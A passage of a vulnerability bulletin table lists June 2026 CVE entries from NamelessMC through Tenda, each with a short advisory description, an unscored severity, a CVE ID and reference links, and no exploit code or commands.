| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, the profile page (modules/Core/pages/profile.php) processes wall post submissions and replies before verifying whether the viewer is authorized to access the profile. This allows any user with the profile.post permission to write wall posts to private or blocking profiles. Additionally, the reply branch does not verify that the target wall post belongs to the current profile, enabling attackers to inject replies into arbitrary wall posts owned by other profiles via a restricted profile URL. This is patched in version 2.2.5. | 2026-06-02 | not yet calculated | CVE-2026-35447 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-c9xj-rxgw-g2hq |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4,`core/classes/Misc/ProfilePostReactionContext.php` only verifies that the wall post exists and does not enforce blocked/private-profile visibility. `modules/Core/queries/reactions.php` allows unauthenticated GET requests for reaction details. This means that unauthenticated visitors can read reaction participants and timestamps for private profile posts and uthenticated low-privileged users can add reactions to private or blocking profile posts. Version 2.2.5 fixes the issue. | 2026-06-02 | not yet calculated | CVE-2026-40314 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-55q9-8qm3-4grc |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In version 2.2.4, `core/classes/Misc/ProfilePostReactionContext.php` only verifies that the wall post exists and does not enforce blocked/private-profile visibility. This means that authenticated low-privileged users can add reactions to private or blocking profile posts. Version 2.2.5 contains a patch. | 2026-06-02 | not yet calculated | CVE-2026-40571 | https://github.com/NamelessMC/Nameless/security/advisories/GHSA-47hr-jj6c-rqf9 |
| NETAPP--Active IQ Config Advisor | Active IQ Config Advisor version 6.7.3 contains hard-coded credentials that could allow an authenticated attacker with low privileges to perform unauthorized AutoSupport operations. | 2026-06-03 | not yet calculated | CVE-2026-22054 | https://security.netapp.com/advisory/ntap-20260603-0001 |
| NETAPP--Active IQ OneCollect | Active IQ OneCollect version 2.7.3 contains hard-coded credentials that could allow an authenticated attacker with low privileges to perform unauthorized AutoSupport operations. | 2026-06-03 | not yet calculated | CVE-2026-22055 | https://security.netapp.com/advisory/ntap-20260603-0002 |
| netty--netty-incubator-codec-ohttp | The netty incubator codec.bhttp is a java language binary http parser. Prior to version 0.0.21.Final, HKDF_expand returns non-NULL on failure. The byte[] is filled with zeros and has no way to distinguish success from failure. Since this output is used as HKDF key material for the response AEAD, a failure silently produces an all-zero key. When EVP_HPKE_CTX_export fails it also returns an empty byte[] array filled with zeros. This byte[] feeds directly into OHttpCrypto.createResponseAEAD(...). A silent all-zero export secret would produce a deterministic, attacker-predictable AEAD key. Version 0.0.21.Final patches the issue. | 2026-06-04 | not yet calculated | CVE-2026-41207 | https://github.com/netty/netty-incubator-codec-ohttp/security/advisories/GHSA-f659-372h-6x3x https://github.com/netty/netty-incubator-codec-ohttp/commit/3d3b4e527fc82ad0fe3db1af951ffd0ec9a10680 |
| netty--netty-incubator-codec-ohttp | The netty incubator codec.bhttp is a java language binary http parser. The library implements Oblivious HTTP (RFC 9458) using BoringSSL's HPKE C library via JNI. When deriving native memory addresses for cryptographic operations versions prior to 0.0.22.Final provide a fallback path for direct ByteBufs that do not expose their memory address through `hasMemoryAddress()`. This fallback occurs when `sun.misc.Unsafe` is unavailable to Netty - for example, when the JVM is started with `-Dio.netty.noUnsafe=true`, when a SecurityManager restricts Unsafe access, or when running on non-HotSpot JVMs. In these configurations, Netty's default `PooledByteBufAllocator` returns `PooledDirectByteBuf` instances for which `hasMemoryAddress()` returns false. Under the enabling JVM configuration, an unauthenticated network attacker can cause the OHTTP gateway to corrupt memory belonging to other concurrent connections and disclose the contents of adjacent pooled direct buffers by triggering cryptographic operations with crafted OHTTP requests. The corruption occurs regardless of whether the AEAD tag verification succeeds, as BoringSSL zeroizes the output buffer on failure. The information disclosure path provides the attacker with the encryption key needed to extract the leaked data. This violates the confidentiality and integrity of all connections sharing the same Netty buffer arena. Version 0.0.22.Final fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-48040 | https://github.com/netty/netty-incubator-codec-ohttp/security/advisories/GHSA-32hf-8jw3-v4qq https://github.com/netty/netty-incubator-codec-ohttp/commit/7ad38d5cc2827af7e067e5c1e1ac37cd4566dad9 |
| netty--netty-incubator-codec-ohttp | The netty incubator codec.bhttp is a java language binary http parser. Prior to version 0.0.22.FInal, the codec-ohttp implementation of draft-ietf-ohai-chunked-ohttp does not verify that a cryptographically-signed final chunk was received before the outer HTTP body terminates. An on-path adversary (the OHTTP relay itself, or any MITM on the relay↔gateway or relay↔client transport) can forward a prefix of a legitimate chunked-OHTTP message-cut at a non-final chunk boundary-and close the outer body cleanly, producing no decryption error and no exception in the receiving application. Version 0.0.22.Final fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-48480 | https://github.com/netty/netty-incubator-codec-ohttp/security/advisories/GHSA-r6fj-869h-4f6q https://github.com/netty/netty-incubator-codec-ohttp/commit/28f977f293591a4e837bd59ceb441f9f70349915 |
| Northern.tech--CFEngine Enterprise | Northern.tech CFEngine Enterprise 3.24.3 before 3.24.4 and 3.27.0 before 3.27.1 allows XSS. | 2026-06-02 | not yet calculated | CVE-2026-33553 | https://Northern.tech https://cfengine.com/blog/2026/cve-2026-33553-xss-in-mission-portal/ |
| OALDERS--HTML::Entities | HTML::Entities versions before 3.84 for Perl read freed heap memory in _decode_entities. The XS routine backing HTML::Entities::_decode_entities cached a pointer (repl) into the entity-value SV returned by hv_fetch on the entity2char hash. When the input SV was identical to a value SV in that hash, and that value contained its own key as an entity reference, a later call to grow_gap() reallocated the SV's PV buffer and freed the backing allocation that repl still pointed into. The subsequent copy loop read repl_len bytes from the freed allocation. The read may disclose adjacent heap contents into the destination SV. | 2026-06-04 | not yet calculated | CVE-2026-8829 | https://github.com/libwww-perl/HTML-Parser/pull/56 https://github.com/libwww-perl/HTML-Parser/commit/6922552b0778c90a9587a3894e248be4d3a25e1c.patch |
| Octopus Deploy--Octopus Server | In affected versions of Octopus Server, permissions were not checked correctly resulting in any authenticated user being able to make server level changes using a certain API endpoint despite receiving an error. | 2026-06-04 | not yet calculated | CVE-2026-4881 | https://advisories.octopus.com/post/2026/sa2026-04 |
| Open vSwitch--Open vSwitch | A missing upper-bound check in the udpif_set_threads() function of Open vSwitch v3.6.90 allows an attacker with OVSDB write access to request an excessive number of handler or revalidation threads. This can cause a denial of service (DoS) via resource exhaustion. | 2026-06-04 | not yet calculated | CVE-2026-36499 | https://github.com/majdlatah/OVS-Other-Config-Bug |
| open-telemetry--go.opentelemetry.io/otel/schema/v1.1 | OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.0.17, `go.opentelemetry.io/otel/schema/v1.0` and `go.opentelemetry.io/otel/schema/v1.1` leaks one file descriptor on each successful `ParseFile` call. `ParseFile` opens the schema file and passes it to `Parse` without closing it; repeated parsing in a long-running process can exhaust the process file descriptor limit and cause denial of service. Exploitation depends on a consuming application exposing repeated schema parsing to an attacker-controlled path. Version 0.0.17 contains a patch for the issue. | 2026-06-04 | not yet calculated | CVE-2026-45287 | https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-995v-fvrw-c78m https://github.com/open-telemetry/opentelemetry-go/commit/e72a235518cb773137efd80336a179028bc34684 https://github.com/open-telemetry/opentelemetry-go/commit/f12d198f161b61735d65705248715aa97021ba8d |
| OpenAI--OpenAI Atlas | OpenAI Atlas before 1.2025.288.15 exposed privileged browser APIs to web content on *.openai.com origins. A cross-site scripting vulnerability in forum.openai.com could be used to access these functions, allowing access to browser history information and the ability to open or close tabs. OpenAI Atlas 1.2025.288.15 narrows access to these APIs to *.chatgpt.com; users should upgrade to 1.2025.288.15 or later. | 2026-06-05 | not yet calculated | CVE-2026-11326 | Pwning OpenAI Atlas Through Exposed Browser Internals |
| OpenAirInterface5G--OpenAirInterface5G 2.4.0 | An issue was discovered in OpenAirInterface5G 2.4.0 (nr-softmodem) in the E2SM-KPM RAN Function's PRB utilization metric calculation. The functions fill_RRU_PrbTotDl() and fill_RRU_PrbTotUl() in openair2/E2AP/RAN_FUNCTION/O-RAN/ran_func_kpm_subs.c (lines 182 and 197) compute PRB usage percentages by dividing by the difference of two consecutive total_prb_aggregate samples without checking for zero. When a malicious xApp sends a high volume of E42_RIC_SUBSCRIPTION_REQUESTs via the FlexRIC iApp (port 36422/SCTP), the E2 Agent generates KPM Indication reports at high frequency. If two consecutive sampling intervals yield identical PRB aggregate values, the divisor becomes zero, triggering SIGFPE and crashing the entire 5G base station process (nr-softmodem). This results in complete 5G cell service interruption for all connected UEs. No authentication is required. | 2026-06-01 | not yet calculated | CVE-2026-37232 | https://gitlab.eurecom.fr/oai/openairinterface5g https://github.com/MinamiKotor1/oran-security-advisories-zhongnan-luo/blob/main/advisories/CVE-2026-37232.md |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Versions prior to 7.260227.0 are vulnerable to XSS in the rendering of email-message observable body data. The content of the body field isn't appropriately sanitized when being rendered. Does require user interaction but could be exploited by someone sharing stix or any of the ingester. This could lead to CSRF and then large scale session theft. Version 7.260227.0 contains a fix. | 2026-06-02 | not yet calculated | CVE-2026-35212 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-rg6r-x26x-63vq |
| openlabs--openlabs | An OS command injection vulnerability in the app.py component of openlabs docker-wkhtmltopdf-aas up to commit 9f50579 allows attackers to execute arbitrary commands via a crafted POST request. | 2026-06-03 | not yet calculated | CVE-2026-36576 | https://github.com/openlabs/docker-wkhtmltopdf-aas/issues/36 https://github.com/openlabs/docker-wkhtmltopdf-aas https://github.com/openlabs/docker-wkhtmltopdf-aas/blob/9f505797671c3339520dec5fc01dff3a6f324f2e/app.py#L40 https://hub.docker.com/r/openlabs/docker-wkhtmltopdf-aas |
| OpenStack--oslo.messaging | An issue was discovered in OpenStack oslo.messaging 1.0.0 through 17.3.0. The oslo.messaging RabbitMQ driver does not perform TLS hostname verification when connecting to the message broker. When ssl_ca_file is configured, the driver enables certificate chain validation but does not pass the expected broker hostname into the underlying TLS stack. Any certificate signed by the deployment CA is accepted regardless of hostname, allowing an attacker who can intercept control-plane traffic to impersonate the RabbitMQ broker and perform a man-in-the-middle attack on RPC and notification traffic. All OpenStack services using oslo.messaging with RabbitMQ over TLS are affected. | 2026-06-04 | not yet calculated | CVE-2026-44393 | https://bugs.launchpad.net/oslo.messaging/+bug/2150316 https://wiki.openstack.org/wiki/OSSN/OSSN-0096 |
| prefecthq--prefecthq/prefect | In version 3.6.19 of prefecthq/prefect, an authentication bypass vulnerability exists due to the improper handling of URL path exemptions for health check probes. Specifically, the authentication middleware exempts any URL path ending with 'health' or 'ready' from authentication checks. This allows an attacker to create resources with names ending in 'health' or 'ready' and access them without authentication. Affected endpoints include those for variables, flows, work pools, work queues, and deployments. This vulnerability can lead to unauthorized access to sensitive information, such as API keys and database credentials, stored in Prefect Variables. | 2026-06-02 | not yet calculated | CVE-2026-3514 | https://huntr.com/bounties/c540e5e1-f74f-44f4-bfa0-9764ff6daa75 https://github.com/prefecthq/prefect/commit/e21617125335025b4b27e7d6f0ca028e8e8f3b79 |
| projectcapsule--capsule | Capsule is a multi-tenancy and policy-based framework for Kubernetes. The Capsule Controller runs with cluster-admin privileges. Although the TenantResource RawItems processing logic forcibly sets the namespace, this is ineffective for cluster-scoped resources. Prior to version 0.13.0, tenant administrators can leverage the Controller's elevated privileges to create cluster-scoped resources (such as ClusterRole and ValidatingWebhookConfiguration) that they cannot create directly, achieving cross-tenant privilege escalation and cluster-level attacks. The attack vector has a few limiting factors. This attack requires Tenant Owner privileges and requires Capsule Controller running with cluster-admin privileges (default configuration). Additionally, some clusters may have additional admission controllers blocking malicious resources. Version 0.13.0 patches this issue. | 2026-06-01 | not yet calculated | CVE-2026-22872 | https://github.com/projectcapsule/capsule/security/advisories/GHSA-qjjm-7j9w-pw72 https://github.com/projectcapsule/capsule/releases/tag/v0.13.0 |
| ProjectsAndPrograms--school-management-system | ProjectsAndPrograms school-management-system is vulnerable to Stored Cross‑Site Scripting (XSS) in multiple attributes of students and teachers objects. An authorized attacker (e.g., a teacher or administrator) can inject malicious JavaScript that is subsequently executed in other users' browsers. Critically, when chained with CVE‑2025‑11661, which allows unauthenticated access to backend endpoints, this vulnerability can be exploited by a remote attacker without privileges to inject and execute arbitrary JavaScript. The maintainers were notified early about this vulnerability but did not provide details regarding affected versions. The version corresponding to commit 6b6fae5 was tested and confirmed vulnerable; other versions were not tested and may also be affected. | 2026-06-03 | not yet calculated | CVE-2026-47324 | https://cert.pl/en/posts/2026/06/CVE-2026-47324/ https://oranbyte.com/projects/school-management-system |
| ProjectsAndPrograms--school-management-system | ProjectsAndPrograms school-management-system uses predictable credentials by generating student's and teacher's passwords solely from the user's date of birth (e.g., 12072000 for 12 July 2000). The application does not require or prompt users to change the password upon first login. This behavior allows attackers to easily guess or derive valid credentials, leading to unauthorized account access. The maintainers were notified early about this vulnerability but did not provide details regarding affected versions. The version corresponding to commit 6b6fae5 was tested and confirmed vulnerable; other versions were not tested and may also be affected. | 2026-06-03 | not yet calculated | CVE-2026-47325 | https://cert.pl/en/posts/2026/06/CVE-2026-47324/ https://oranbyte.com/projects/school-management-system |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Prior to version 1.12.3, the Pterodactyl Client API has a logic flaw that lets users bypass their assigned limits for database allocations. This happens because the database locking mechanism used in the controllers is totally broken and doesn't actually lock anything. Version 1.12.3 patches the issue. | 2026-06-02 | not yet calculated | CVE-2026-35202 | https://github.com/pterodactyl/panel/security/advisories/GHSA-fgmm-w5cx-vrfw |
| Python Packaging Authority--pip | pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory. | 2026-06-01 | not yet calculated | CVE-2026-8643 | https://github.com/pypa/pip/pull/14000 https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ/ |
| Python Software Foundation--CPython | unicodedata.normalize() can take excessive CPU time when processing specially crafted Unicode input containing long runs of combining characters with alternating Canonical Combining Class values. This affects all normalization forms. | 2026-06-03 | not yet calculated | CVE-2026-3276 | https://mail.python.org/archives/list/security-announce@python.org/thread/PP5HB4K7727OBBM76KA2ILID76K3OZGZ/ https://github.com/python/cpython/pull/149080 https://github.com/python/cpython/issues/149079 https://github.com/python/cpython/commit/6b505d1f41f8f3ea0fe5a4786d3a8fff1875cfc0 https://github.com/python/cpython/commit/991224b1e8311c85f198f6dd8208bf8cff7fc26f https://github.com/python/cpython/commit/ba785b88add96acbf403d65cb157fb2743a33a32 https://github.com/python/cpython/commit/c5512bd7c1dc28055660565275012766941d3066 |
| Python Software Foundation--CPython | tarfile.data_filter could be bypassed using crafted link entries, including symlinks with empty or directory-like names, to redirect later archive members outside the intended extraction directory. This allowed a malicious tar archive to cause tarfile.extractall() to write files outside the destination directory, subject to the permissions of the extracting process. | 2026-06-04 | not yet calculated | CVE-2026-7774 | https://github.com/python/cpython/pull/149487 https://github.com/python/cpython/issues/149486 https://mail.python.org/archives/list/security-announce@python.org/thread/4FU62L2M6RMMHT2QPGQNPEHHUND7CEX5/ |
| QOS.CH Sarl--logback | Deserialization of untrusted data vulnerability in QOS.CH Sarl logback logback-core (HardenedObjectInputStream (logback-core) modules) allows Object Injection, albeit heavily restricted. More precisely, an attacker able to influence serialized data sent to SimpleSocketServer or SimpleSSLSocketServer can instantiate Proxy objects. Although deserialization is heavily restricted by HardenedObjectInputStream and no practical way to achieve remote code execution or significant privilege escalation has been identified, this issue constitutes a bypass of the intended security restrictions. This issue affects logback: through 1.5.33 inclusive. | 2026-06-01 | not yet calculated | CVE-2026-10532 | https://logback.qos.ch/news.html#1.5.34 |
| remix-run--react-router | React Router is a router for React. In versions 7.0.0 through 7.14.0 and 6.7.0 through 6.30.3, certain URLs passed to the redirect function can trigger an open redirect to an external domain due to path values starting with // being reinterpreted as protocol-relative URLs. The level of impact depends on the validation done by the application prior to returning the redirect. This does not impact applications using Declarative Mode (<BrowserRouter>). This is patched in versions 7.14.1 and 6.30.4. | 2026-06-02 | not yet calculated | CVE-2026-40181 | https://github.com/remix-run/react-router/security/advisories/GHSA-2j2x-hqr9-3h42 |
| Roche Diagnostics--navify Digital Pathology | Use of default credentials vulnerability in Roche Diagnostics navify Digital Pathology (RabbitMQ Management interface modules) allows Default Usernames and Passwords. This issue affects navify Digital Pathology: from 2.0.0 before 2.4.1. | 2026-06-02 | not yet calculated | CVE-2026-9844 | https://diagnostics.roche.com/global/en/legal/product-security-advisory.html |
| RockRMS--RockRMS v16.13 | RockRMS v16.13 and before v.17.7.0 is vulnerable to Cross Site Scripting (XSS) via Social Media links in user profile. | 2026-06-03 | not yet calculated | CVE-2026-36748 | http://sparkdevnetwork.com https://raxis.com/blog/cve-2026-36748-xss-in-rock-rms-leads-to-privilege-escalation/ |
| RRWO--Net::CIDR::Set | Net::CIDR::Set versions through 0.20 for Perl accept non-ASCII IP addresses and netmasks. Unicode digits such as the Arabic-Indic One (U+0661) were accepted but not properly parsed as numbers. This could allow network masks to accept larger networks. | 2026-06-04 | not yet calculated | CVE-2026-49940 | https://metacpan.org/release/RRWO/Net-CIDR-Set-0.21/changes https://nvd.nist.gov/vuln/detail/CVE-2025-40911 |
| RRWO--Net::CIDR::Set | Net::CIDR::Set versions through 0.20 for Perl did not validate IP addresses. The add method called the _encode method to parse addresses. If the addresses did not look like netmasks or network ranges, then they were assumed to single IP addresses and passed back to itself as a 32-bit or 128-bit netmask. If the argument was not a well-formed IP address, then this would lead to indefinite recursion. An attacker could use this to cause a denial of service. | 2026-06-04 | not yet calculated | CVE-2026-49941 | https://metacpan.org/release/RRWO/Net-CIDR-Set-0.21/changes |
| RRWO--Net::CIDR::Set | Net::CIDR::Set versions through 0.20 for Perl did not validate network masks. The mask portion of a network mask could contain Unicode digits such as the Arabic-Indic One (U+0661), or non-digits, which were ignored. This could allow network masks to accept larger networks. Leading zeros were also accepted, but treated as decimal instead of octal. This could lead to confusion about what networks are acceptable. | 2026-06-04 | not yet calculated | CVE-2026-49942 | https://metacpan.org/release/RRWO/Net-CIDR-Set-0.21/changes https://nvd.nist.gov/vuln/detail/CVE-2025-40911 https://nvd.nist.gov/vuln/detail/CVE-2026-45191 |
| RURBAN--Cpanel::JSON::XS | Cpanel::JSON::XS versions before 4.41 for Perl allow type confusion via duplicate object keys when dupkeys_as_arrayref is enabled. decode_hv() collapses duplicate object keys into an array reference under dupkeys_as_arrayref. The branch reached for a duplicate key tests `SvTYPE (old_value) != SVt_RV && SvTYPE (SvRV (old_value)) != SVt_PVAV`, which evaluates SvRV(old_value) before establishing that old_value is a reference. When the existing value is a plain scalar rather than an array reference, a non-reference scalar is dereferenced as a reference. A caller decoding untrusted JSON with dupkeys_as_arrayref enabled is crashed, and the incompatible access follows a pointer taken from attacker controlled scalar contents. | 2026-06-03 | not yet calculated | CVE-2026-9334 | https://github.com/rurban/Cpanel-JSON-XS/commit/11a7c550a0d8fac2f84414f24d5df9b2bfe346e2.patch https://metacpan.org/release/RURBAN/Cpanel-JSON-XS-4.41/changes |
| RURBAN--Cpanel::JSON::XS | Cpanel::JSON::XS versions before 4.41 for Perl allow denial of service via UTF-8 BOM prefixed input when a decode filter callback throws. To skip a leading 3-byte UTF-8 BOM, decode_json() advances the input scalar's string pointer past the mark with SvPV_set() and restores it only on the normal return path. When decoding aborts through a Perl exception, for example a filter_json_object callback that croaks, the restore is skipped and the scalar is left with its string pointer offset into its own buffer and a shortened length. When that scalar is later freed, the allocator receives an invalid pointer and the interpreter aborts. A single BOM prefixed document decoded with a throwing filter callback crashes any caller. | 2026-06-03 | not yet calculated | CVE-2026-9516 | https://github.com/rurban/Cpanel-JSON-XS/commit/dfe1b41a36caba51dc12a2917fe50285d1ffaa7b.patch https://metacpan.org/release/RURBAN/Cpanel-JSON-XS-4.41/changes |
| Samsung Mobile--Samsung Android USB Driver for Windows | Improper input validation in Samsung Android USB Driver for Windows prior to version 1.9.5.0 allows local attacker to access out-of-bounds memory. | 2026-06-05 | not yet calculated | CVE-2026-21038 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Assistant | Improper export of android application components in SmartHomeWidgetReceiver of Samsung Assistant prior to version 9.3.14 allows local attacker to execute arbitrary script. | 2026-06-05 | not yet calculated | CVE-2026-21032 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Assistant | Improper export of android application components in ExpressHomeWidgetReceiver of Samsung Assistant prior to version 9.3.14 allows local attacker to execute arbitrary script. | 2026-06-05 | not yet calculated | CVE-2026-21033 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Auto | Improper export of android application components in Samsung Auto prior to version 3.1.2.61 in Android 15 and 3.2.0.38 in Android 16 allows local attacker to change audio configuration. | 2026-06-05 | not yet calculated | CVE-2026-21034 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Internet | Improper authorization in Samsung Internet prior to version 30.0.0.39 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21036 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Members | Improper input validation in Samsung Members prior to version 5.8.01.5 allows local attackers to access arbitrary URL and launch arbitrary activity with Samsung Members privilege. | 2026-06-05 | not yet calculated | CVE-2026-21037 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper handling of insufficient privileges in SecTelephonyProvider prior to SMR Jun-2026 Release 1 allows local attackers to access privileged files. | 2026-06-05 | not yet calculated | CVE-2026-21017 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Incorrect privilege assignment in Telephony prior to SMR Jun-2026 Release 1 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21025 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in SpriteWallpaper prior to SMR Jun-2026 Release 1 allows local attackers to access to sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21026 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in ImsSettings prior to SMR Jun-2026 Release 1 allows local attackers to trigger logging function. | 2026-06-05 | not yet calculated | CVE-2026-21027 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in AuditLogService prior to SMR Jun-2026 Release 1 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21028 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in Galaxy Editing Service prior to SMR Jun-2026 Release 1 allows local attacker to execute privileged operations. | 2026-06-05 | not yet calculated | CVE-2026-21029 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in MediaTek Audio HAL prior to SMR Jun-2026 Release 1 allows local attackers to trigger privileged functions. | 2026-06-05 | not yet calculated | CVE-2026-21030 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper authorization in AppBlock prior to SMR Jun-2026 Release 1 allows local attacker to launch arbitrary activity. User interaction is required for triggering this vulnerability. | 2026-06-05 | not yet calculated | CVE-2026-21031 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Plus TV | Improper input validation in Samsung Plus TV prior to version 1.0.28.6 allows remote attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21035 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| SANBEG--Etsy::StatsD | Etsy::StatsD versions through 1.002002 for Perl allow metric injections. The metric names and values are not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Note that the git repository contains an unreleased version with the gauge and set methods that also do not check for potential metric injections. | 2026-06-04 | not yet calculated | CVE-2026-46741 | https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| sanic-cors--sanic-cors | sanic-cors version 2.2.0 and prior contains an improper regular expression in the try_match() function in sanic_cors/core.py that uses re.match without end-anchoring. This allows an attacker to bypass CORS origin allowlists by registering a domain that begins with a trusted origin string, to gain unauthorized access to cross-origin requests for authenticated resources. | 2026-06-05 | not yet calculated | CVE-2026-37737 | https://github.com/ashleysommer/sanic-cors/blob/master/sanic_cors/core.py https://github.com/ashleysommer/sanic-cors https://pypi.org/project/Sanic-Cors/ https://github.com/npbhatter17/security-advisories/blob/main/CVE-2026-37737-sanic-cors-advisory.md |
| sbabic--SWUpdate | SWUpdate before 2026.05 is affected by a time-of-check time-of-use (TOCTOU) race condition that allows local unprivileged attackers to escalate privileges to root or install untrusted contents using a signed update. | 2026-06-03 | not yet calculated | CVE-2025-41259 | https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20251206-01_SWUpdate_Untrusted_Script_Execution_via_Signed_Update_TOCTOU https://github.com/sbabic/swupdate/commit/f4bd64260e233e207354d68d572b1cbc3e63689d https://github.com/sbabic/swupdate |
| SeaChest--openSeaChest | Out of bounds write in openSeaChest's Trim/Unmap operation in Seagate's openSeaChest v26.03.0 on all supported platforms allows for writing extra memory describing a range of LBAs to deallocate 16 bytes outside of the allocated space when running this operation. | 2026-06-02 | not yet calculated | CVE-2026-10718 | https://www.seagate.com/product-security/#security-advisories https://www.seagate.com/support/software/seachest/ |
| SeaChest--openSeaChest | Out of bounds write in openSeaChest's --showSupportedFormats in Seagate's openSeaChest v25.05.3 on all supported platforms allows for writing 1 extra byte outside of allocated memory which sets a value to 1 via a maliciously crafted NVMe device with a bogus value in the namespace FLBAS byte. | 2026-06-02 | not yet calculated | CVE-2026-10719 | https://www.seagate.com/product-security/#security-advisories https://www.seagate.com/support/software/seachest/ |
| Seagate--openSeaChest | Out of bounds write and reads in openSeaChest's --showSCSIDefects in Seagate's openSeaChest v25.05.3 on all supported platforms allows for writing defect information out of bounds for very large defects lists via a very bad drive with lots of defects or a maliciously crafted SCSI device's defect response length. | 2026-06-02 | not yet calculated | CVE-2026-10717 | https://www.seagate.com/product-security/#security-advisories https://www.seagate.com/support/software/seachest/ |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension downloads JSON files containing crisis alert keywords and filtering rules over unencrypted HTTP via the Fetch API. Other endpoints in the same extension correctly fetch IWF and CIPA data over HTTPS, demonstrating an inconsistent implementation of TLS. | 2026-06-03 | not yet calculated | CVE-2026-8874 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension contains hardcoded, plaintext AES passphrases in securly.min.js. These keys decrypt crisis alert keyword data and intervention site data. | 2026-06-03 | not yet calculated | CVE-2026-8876 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension exposes multiple publicly accessible endpoints that allow unauthenticated access to sensitive data. The exposed information consists of SHA-1 hashes that are inadequately obfuscated using a simple Caesar cipher, which can be easily reversed to recover the original hash values and access the protected data. | 2026-06-03 | not yet calculated | CVE-2026-8878 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension dynamically registers content13.min.js as a content script via chrome.scripting.registerContentScripts() at runtime. This script is NOT declared in manifest.json and bypasses Chrome Web Store static security review. It runs on all URLs and immediately hides all page content, creates a full-page overlay, pauses all videos, and only restores content when the service worker confirms the page passes filtering. If Securly's servers are unreachable, pages remain indefinitely hidden. | 2026-06-03 | not yet calculated | CVE-2026-8879 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension uses EVP_BytesToKey key derivation with MD5 and a single iteration for AES encryption. MD5 has been broken since 2004 and a single iteration provides no key stretching. | 2026-06-03 | not yet calculated | CVE-2026-8881 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension downloads config.json over HTTP and compiles server-provided patterns as JavaScript regular expressions via new RegExp() without complexity validation. An on-path attacker can inject specific patterns to cause catastrophic backtracking, resulting in denial of service on all browsing. | 2026-06-03 | not yet calculated | CVE-2026-8888 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension uses deprecated SHA-1 hashing for IWF CSAM URL matching (25,020 hashes) and CIPA blocklist matching (12,352 hashes). | 2026-06-03 | not yet calculated | CVE-2026-8889 | https://kb.cert.org/vuls/id/595768 |
| Shenzhen Tenda Technology--Tenda FH451 V1.0.0.9 | Shenzhen Tenda Technology Co., Ltd Tenda FH451 V1.0.0.9 was discovered to contain a stack overflow in the page parameter of the fromDhcpListClient function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-05 | not yet calculated | CVE-2026-36785 | https://github.com/xhh0124/SemVulLLM/ https://github.com/xhh0124/SemVulLLM/tree/main/FH451/fromDhcpListClient_0 |
